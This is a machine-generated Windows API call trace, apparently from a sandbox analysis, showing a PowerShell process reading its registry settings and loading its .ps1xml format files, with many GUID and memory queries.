	[0226.134] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e5285c | out: lpFileInformation=0x2e5285c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0226.134] GetLastError () returned 0x0
	[0226.134] SetErrorMode (uMode=0x1) returned 0x1
	[0226.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0226.134] GetLastError () returned 0x0
	[0226.134] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3a8 | out: phkResult=0x29e3a8*=0x358) returned 0x0
	[0226.135] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x0, lpcbData=0x29e3ec*=0x0 | out: lpType=0x29e3f0*=0x1, lpData=0x0, lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.135] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x7a4288, lpcbData=0x29e3ec*=0x56 | out: lpType=0x29e3f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.135] RegCloseKey (hKey=0x358) returned 0x0
	[0226.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0226.135] GetLastError () returned 0x0
	[0226.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29dee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0226.135] GetLastError () returned 0x0
	[0226.136] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x913d6187, Data2=0x4cfc, Data3=0x4a89, Data4=([0]=0x95, [1]=0x2f, [2]=0xb, [3]=0x1c, [4]=0xad, [5]=0xf4, [6]=0x1d, [7]=0xb2))) returned 0x0
	[0226.136] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xc7a3fbd1, Data2=0x6ff0, Data3=0x4b82, Data4=([0]=0xb6, [1]=0xcc, [2]=0xc4, [3]=0x8c, [4]=0xbd, [5]=0xf3, [6]=0xf8, [7]=0xf5))) returned 0x0
	[0226.136] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xc4ee6d86, Data2=0xd7d8, Data3=0x49f8, Data4=([0]=0x95, [1]=0x14, [2]=0x47, [3]=0xde, [4]=0x79, [5]=0x9e, [6]=0x7a, [7]=0xfe))) returned 0x0
	[0226.136] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x93369049, Data2=0xa4fe, Data3=0x4f80, Data4=([0]=0xbe, [1]=0x26, [2]=0x45, [3]=0x51, [4]=0xe5, [5]=0x65, [6]=0x23, [7]=0x85))) returned 0x0
	[0226.137] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x296f32b4, Data2=0x6ad7, Data3=0x4899, Data4=([0]=0x9b, [1]=0xe0, [2]=0x74, [3]=0xdd, [4]=0xbb, [5]=0x4f, [6]=0x5d, [7]=0x5d))) returned 0x0
	[0226.137] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x67a9e952, Data2=0x44cf, Data3=0x4af2, Data4=([0]=0x9f, [1]=0xc7, [2]=0x3e, [3]=0x3c, [4]=0x75, [5]=0x51, [6]=0xd8, [7]=0x63))) returned 0x0
	[0226.137] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.137] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x67f4da39, Data2=0xdf6a, Data3=0x4e33, Data4=([0]=0x9c, [1]=0xc5, [2]=0xb1, [3]=0xbe, [4]=0x43, [5]=0xef, [6]=0xfe, [7]=0x21))) returned 0x0
	[0226.137] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.137] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.137] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x107c9535, Data2=0x1b1c, Data3=0x42fd, Data4=([0]=0x99, [1]=0x74, [2]=0x20, [3]=0xa9, [4]=0xd5, [5]=0xcb, [6]=0x31, [7]=0x81))) returned 0x0
	[0226.137] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xf41b6312, Data2=0xd164, Data3=0x4f5b, Data4=([0]=0xb1, [1]=0xae, [2]=0xf9, [3]=0x8e, [4]=0x86, [5]=0x50, [6]=0xbf, [7]=0x9d))) returned 0x0
	[0226.138] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x4e035d5f, Data2=0x3248, Data3=0x453b, Data4=([0]=0xb4, [1]=0xa0, [2]=0x16, [3]=0x26, [4]=0x69, [5]=0x7c, [6]=0xab, [7]=0x3c))) returned 0x0
	[0226.138] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xf780ed19, Data2=0x3b43, Data3=0x4419, Data4=([0]=0xbc, [1]=0x86, [2]=0x11, [3]=0x56, [4]=0x6, [5]=0xa5, [6]=0x43, [7]=0x60))) returned 0x0
	[0226.138] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.138] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x4783b246, Data2=0xcf73, Data3=0x40ed, Data4=([0]=0x89, [1]=0xfc, [2]=0x18, [3]=0x19, [4]=0x37, [5]=0x60, [6]=0x95, [7]=0x6))) returned 0x0
	[0226.138] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.138] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.139] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.139] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.139] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.140] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x4b9d2148, Data2=0x8557, Data3=0x41bf, Data4=([0]=0x94, [1]=0x48, [2]=0xca, [3]=0x2f, [4]=0x82, [5]=0x5, [6]=0xce, [7]=0xff))) returned 0x0
	[0226.140] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xa2cd062d, Data2=0x26c1, Data3=0x49fb, Data4=([0]=0x95, [1]=0x9b, [2]=0x34, [3]=0xd3, [4]=0x3b, [5]=0xd4, [6]=0x59, [7]=0xe2))) returned 0x0
	[0226.140] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x5521d989, Data2=0x8f11, Data3=0x40c8, Data4=([0]=0xbb, [1]=0x2b, [2]=0xfe, [3]=0xad, [4]=0x32, [5]=0xd9, [6]=0x17, [7]=0x86))) returned 0x0
	[0226.140] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xbd09a642, Data2=0x5126, Data3=0x4da2, Data4=([0]=0x8a, [1]=0xab, [2]=0xe, [3]=0xb6, [4]=0xfe, [5]=0x58, [6]=0xfc, [7]=0x26))) returned 0x0
	[0226.140] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xdb17692a, Data2=0x4f18, Data3=0x4520, Data4=([0]=0x98, [1]=0x8c, [2]=0xaa, [3]=0xba, [4]=0x61, [5]=0x4c, [6]=0x22, [7]=0x64))) returned 0x0
	[0226.140] VirtualQuery (in: lpAddress=0x29d2a4, lpBuffer=0x29e2a4, dwLength=0x1c | out: lpBuffer=0x29e2a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.140] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x756ff42f, Data2=0x994a, Data3=0x4adb, Data4=([0]=0x8c, [1]=0xac, [2]=0x2a, [3]=0x1c, [4]=0x42, [5]=0x9d, [6]=0x2b, [7]=0x67))) returned 0x0
	[0226.140] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x6844dc15, Data2=0xbaf0, Data3=0x40b9, Data4=([0]=0xa0, [1]=0x8c, [2]=0xa8, [3]=0x19, [4]=0xee, [5]=0x45, [6]=0x5d, [7]=0x41))) returned 0x0
	[0226.141] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xac1300cd, Data2=0x223b, Data3=0x4c91, Data4=([0]=0xa7, [1]=0xd6, [2]=0x21, [3]=0x86, [4]=0x50, [5]=0x57, [6]=0xf5, [7]=0x6a))) returned 0x0
	[0226.141] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x9bd27113, Data2=0x858a, Data3=0x474f, Data4=([0]=0x9a, [1]=0xe, [2]=0x76, [3]=0xa0, [4]=0xb6, [5]=0x64, [6]=0x2e, [7]=0xbb))) returned 0x0
	[0226.141] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xad262c51, Data2=0xc575, Data3=0x483e, Data4=([0]=0x8e, [1]=0xcc, [2]=0x5f, [3]=0x47, [4]=0x11, [5]=0xd6, [6]=0xfb, [7]=0xab))) returned 0x0
	[0226.141] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xa4e35797, Data2=0x7a39, Data3=0x4cb9, Data4=([0]=0x8c, [1]=0x3c, [2]=0xa0, [3]=0x25, [4]=0xbb, [5]=0x35, [6]=0xaf, [7]=0xa2))) returned 0x0
	[0226.141] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x5ead6eed, Data2=0xf56c, Data3=0x44d5, Data4=([0]=0xb7, [1]=0x43, [2]=0x4e, [3]=0xbf, [4]=0x7c, [5]=0x9c, [6]=0x95, [7]=0x14))) returned 0x0
	[0226.141] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xe44c495d, Data2=0xc521, Data3=0x44d2, Data4=([0]=0xa8, [1]=0x54, [2]=0x63, [3]=0xce, [4]=0x1f, [5]=0xba, [6]=0x55, [7]=0x5f))) returned 0x0
	[0226.141] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x7dd7429e, Data2=0xd5af, Data3=0x4f14, Data4=([0]=0x86, [1]=0x7a, [2]=0xfc, [3]=0x57, [4]=0x89, [5]=0xfa, [6]=0xa6, [7]=0x77))) returned 0x0
	[0226.141] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xdf1e719, Data2=0x5bf, Data3=0x488d, Data4=([0]=0xa4, [1]=0x5a, [2]=0xa9, [3]=0xe, [4]=0x99, [5]=0xe1, [6]=0xa0, [7]=0x55))) returned 0x0
	[0226.142] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x4fe41a98, Data2=0x3da7, Data3=0x41e0, Data4=([0]=0xba, [1]=0xa7, [2]=0x6a, [3]=0xd1, [4]=0x70, [5]=0x81, [6]=0x5e, [7]=0x42))) returned 0x0
	[0226.142] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x8b267255, Data2=0xc85, Data3=0x47fa, Data4=([0]=0x94, [1]=0x99, [2]=0xf4, [3]=0xb3, [4]=0x88, [5]=0xdd, [6]=0x58, [7]=0x13))) returned 0x0
	[0226.142] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x2cc69b73, Data2=0xe0a2, Data3=0x495f, Data4=([0]=0x81, [1]=0xf, [2]=0x3a, [3]=0x52, [4]=0x1d, [5]=0x98, [6]=0x69, [7]=0x9f))) returned 0x0
	[0226.142] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xeea04991, Data2=0x446a, Data3=0x48e4, Data4=([0]=0xa7, [1]=0xc3, [2]=0x39, [3]=0x54, [4]=0x7d, [5]=0x2c, [6]=0x35, [7]=0xbc))) returned 0x0
	[0226.142] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x299c3d15, Data2=0xc2ad, Data3=0x455f, Data4=([0]=0x97, [1]=0x82, [2]=0x2d, [3]=0x76, [4]=0xca, [5]=0x8, [6]=0x63, [7]=0x7))) returned 0x0
	[0226.142] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x93f1bacd, Data2=0xfe0c, Data3=0x4b06, Data4=([0]=0x83, [1]=0x41, [2]=0xd1, [3]=0x7f, [4]=0x11, [5]=0x32, [6]=0x9c, [7]=0x8))) returned 0x0
	[0226.142] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xc1101347, Data2=0x8e88, Data3=0x475e, Data4=([0]=0x81, [1]=0x1c, [2]=0x2c, [3]=0xbb, [4]=0x64, [5]=0x88, [6]=0x37, [7]=0x66))) returned 0x0
	[0226.142] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xe444a8ae, Data2=0x47df, Data3=0x4b5d, Data4=([0]=0x80, [1]=0xfb, [2]=0x8a, [3]=0x62, [4]=0x33, [5]=0x21, [6]=0x61, [7]=0x70))) returned 0x0
	[0226.142] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xa0437e92, Data2=0x65a4, Data3=0x40c1, Data4=([0]=0x81, [1]=0xe4, [2]=0xeb, [3]=0x45, [4]=0xab, [5]=0xdb, [6]=0x38, [7]=0x4a))) returned 0x0
	[0226.142] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.143] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.144] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.146] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x81cf2a6e, Data2=0x9586, Data3=0x4bae, Data4=([0]=0x8b, [1]=0xec, [2]=0x56, [3]=0x35, [4]=0xb, [5]=0x94, [6]=0xbe, [7]=0x44))) returned 0x0
	[0226.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29debc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0226.146] GetLastError () returned 0x0
	[0226.146] SetErrorMode (uMode=0x1) returned 0x1
	[0226.146] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0226.147] GetLastError () returned 0x0
	[0226.147] GetFileType (hFile=0x358) returned 0x1
	[0226.147] SetErrorMode (uMode=0x1) returned 0x1
	[0226.147] GetFileType (hFile=0x358) returned 0x1
	[0226.147] ReadFile (in: hFile=0x358, lpBuffer=0x2eef748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2eef748*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.148] GetLastError () returned 0x0
	[0226.148] ReadFile (in: hFile=0x358, lpBuffer=0x2eef748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2eef748*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.148] GetLastError () returned 0x0
	[0226.148] ReadFile (in: hFile=0x358, lpBuffer=0x2eef748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2eef748*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.148] GetLastError () returned 0x0
	[0226.148] ReadFile (in: hFile=0x358, lpBuffer=0x2eef748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2eef748*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.148] GetLastError () returned 0x0
	[0226.148] ReadFile (in: hFile=0x358, lpBuffer=0x2eef748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2eef748*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.149] GetLastError () returned 0x0
	[0226.149] ReadFile (in: hFile=0x358, lpBuffer=0x2eef748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2eef748*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.149] GetLastError () returned 0x0
	[0226.149] ReadFile (in: hFile=0x358, lpBuffer=0x2eef748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2eef748*, lpNumberOfBytesRead=0x29e424*=0x119, lpOverlapped=0x0) returned 1
	[0226.149] GetLastError () returned 0x0
	[0226.149] ReadFile (in: hFile=0x358, lpBuffer=0x2eef748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2eef748*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0226.149] GetLastError () returned 0x0
	[0226.149] CloseHandle (hObject=0x358) returned 1
	[0226.149] GetLastError () returned 0x0
	[0226.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0226.149] GetLastError () returned 0x0
	[0226.149] SetErrorMode (uMode=0x1) returned 0x1
	[0226.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f10744 | out: lpFileInformation=0x2f10744*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0226.150] GetLastError () returned 0x0
	[0226.150] SetErrorMode (uMode=0x1) returned 0x1
	[0226.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0226.150] GetLastError () returned 0x0
	[0226.150] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3a8 | out: phkResult=0x29e3a8*=0x358) returned 0x0
	[0226.150] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x0, lpcbData=0x29e3ec*=0x0 | out: lpType=0x29e3f0*=0x1, lpData=0x0, lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.150] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x7a4288, lpcbData=0x29e3ec*=0x56 | out: lpType=0x29e3f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.151] RegCloseKey (hKey=0x358) returned 0x0
	[0226.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0226.151] GetLastError () returned 0x0
	[0226.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29dee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0226.151] GetLastError () returned 0x0
	[0226.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.151] GetLastError () returned 0x0
	[0226.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.151] GetLastError () returned 0x0
	[0226.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.151] GetLastError () returned 0x0
	[0226.152] VirtualQuery (in: lpAddress=0x29d100, lpBuffer=0x29e100, dwLength=0x1c | out: lpBuffer=0x29e100*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.153] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xc6e7ea8b, Data2=0x9aa5, Data3=0x46cf, Data4=([0]=0x81, [1]=0xe9, [2]=0x88, [3]=0xda, [4]=0x92, [5]=0xbe, [6]=0xb8, [7]=0xc9))) returned 0x0
	[0226.153] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.153] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xd1d622a6, Data2=0x28a8, Data3=0x4a59, Data4=([0]=0xb8, [1]=0x97, [2]=0x73, [3]=0xc2, [4]=0x4e, [5]=0x92, [6]=0x2f, [7]=0xa1))) returned 0x0
	[0226.153] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x6bf683ce, Data2=0xfc6, Data3=0x4628, Data4=([0]=0xa8, [1]=0xb0, [2]=0xbd, [3]=0x1, [4]=0x2f, [5]=0x7, [6]=0xba, [7]=0xa6))) returned 0x0
	[0226.153] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xd72cbf9c, Data2=0xb97, Data3=0x4d4a, Data4=([0]=0x89, [1]=0xfa, [2]=0x19, [3]=0xcc, [4]=0xb1, [5]=0x24, [6]=0xa6, [7]=0x4))) returned 0x0
	[0226.153] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.153] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29debc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0226.265] GetLastError () returned 0x0
